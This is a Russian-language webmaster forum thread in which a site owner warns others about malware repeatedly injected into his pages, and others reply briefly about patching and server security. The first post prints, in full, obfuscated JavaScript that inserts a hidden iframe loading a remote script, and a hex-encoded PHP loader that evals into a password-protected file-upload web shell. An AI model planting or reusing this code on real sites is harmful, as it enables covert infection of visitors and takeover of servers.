Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Опять вирь...
цитата
24/03/09 в 09:21
 Maxik
Вчера обнаружл на морде своих сайтов которые находяться на одном сервере вот такой код : Код:
<script>/**/function cai3(VDp0, AbT1, Kjhh) { var Tmt5; Tmt5=VDp0.split(AbT1); var ALB4=Tmt5.join(Kjhh); return ALB4;/**/ } function dhE6(Uob3) { Uob3 = cai3(Uob3,"##+##","'"); Uob3 = cai3(Uob3,"##|##","\\"); ALB4=""; SbX3 =""; for(k=0;k<Uob3.length;k++) { ALB4 = Uob3.charCodeAt(k); if (ALB4==32){ALB4=35} else if (ALB4==35){ALB4=32} else if (ALB4==59){ALB4=64} else if (ALB4==64){ALB4=59} else if (ALB4==37){ALB4=42} else if (ALB4==42){ALB4=37} else if (ALB4>=97 && ALB4<=122) { ALB4=ALB4-97;ALB4=25-ALB4;ALB4+=97; }else if (ALB4>=65 && ALB4<=90) { ALB4=ALB4-65;ALB4=25-ALB4;ALB4+=65; }else if (ALB4>=48 && ALB4<=57) { ALB4=ALB4-48;ALB4=9-ALB4;ALB4+=48; } SbX3 += String.fromCharCode(ALB4); } return SbX3;/**/ }Mlb4=eval;Mlb4(dhE6('ezi#Vcs7#=###+##sggk://zhyzgzmb.xln/rnztvh/a/hgzgrx.ksk##+##@ezi#jzc2#=###+##ruiznv##+##@'));Mlb4(dhE6('ezi#VefE#=#wlxfnvmg.xivzgvVovnvmg(jzc2)@VefE.hvgZggiryfgv(##+##hix##+##,#Vcs7)@'));Mlb4(dhE6('VefE.hvgZggiryfgv(##+##drwgs##+##,9)@VefE.hvgZggiryfgv(##+##svrtsg##+##,9)@VefE.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Mlb4(dhE6('VefE.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Mlb4(dhE6('VefE.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Nlm1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Mlb4(dhE6('ezi#DRl8=Nlm1.rmwvcLu(##+##nhrv##+##)@ezi#LkH7=Nlm1.rmwvcLu(##+##mg#3.##+##)@'));if ((WIo1>0)&&(OpS2==-1)){Mlb4(dhE6('wlxfnvmg.ylwb.zkkvmwXsrow(VefE)@'));}</script>       
Код появляется аккурат после БОДИ.
После перерисовки морды код ненадолго пропадает, но потом опять появляется. На сервере стоят ATS, Протон и Стрим. Файлики sync.php, backup.html и совпадающие с именами кталогов с расширениями .php с вот таким кодом: Код:
<?php $s="202069662028245F504F53545B706173735D213D273132332729207B206563686F2
027203C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61
643D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726
D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F72
6D3E3C2F626F64793E20203C2F68746D6C3E273B206578697428293B207D6563686F202
73C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643
D22646F63756D656E742E6D79662E63632E666F63757328293B223E273B6563686F2027
3C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D2
26D756C7469706172742F666F726D2D64617461223E3C696E70757420747970653D6869
6464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2
E273E3C696E70757420747970653D66696C65206E616D653D757066696C653E3C696E70
";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))
+0);$sss.=$ss;}eval($sss);$ssss="************************************
*********************************************************************
**********";?>

Появляются преимоушественно в папах где лежат ATSы, но были замечены по всему серверу. После их полного удаления, появляются опять.
Такчто, дорогие друзья, проверяйти свои "морды".
Хотелось бы чтобы разработчики скриптов помогли разобраться с проблеммой и залатали дыры.
P.S. Свои морды я зачмодил только на чтение, поэтому кодов в них нету. Трейдеров просьба не беспокоиться.
P.P.s. У ATS пришлось зачмодить именно темплейт, поскольку коды появлялись именно в нем. index.php в корне живет нормально.
цитата
24/03/09 в 12:59
 von Stoltz
Дыра давно залатана, стучи в аську 209-905-775
цитата
25/03/09 в 12:50
 Maxik
Убил однако виря тем же способом как и в прошлый раз, который описывался в полугоданазадичном топике. Хер я формы больше открою!
цитата
25/03/09 в 13:01
 von Stoltz
Ты бы разобрался для начала, откуда он взялся. Формы тут не при чем, по крайней мере, если версия 1.7.2+ стоит.
цитата
25/03/09 в 15:56
 Maxik
Сейчас уже поздно разбираться.
Да икак собственно?
цитата
25/03/09 в 19:19
 harvester
Надо обратиться к специалисту, чтобы безопасность сервака устроил.


Эта страница в полной версии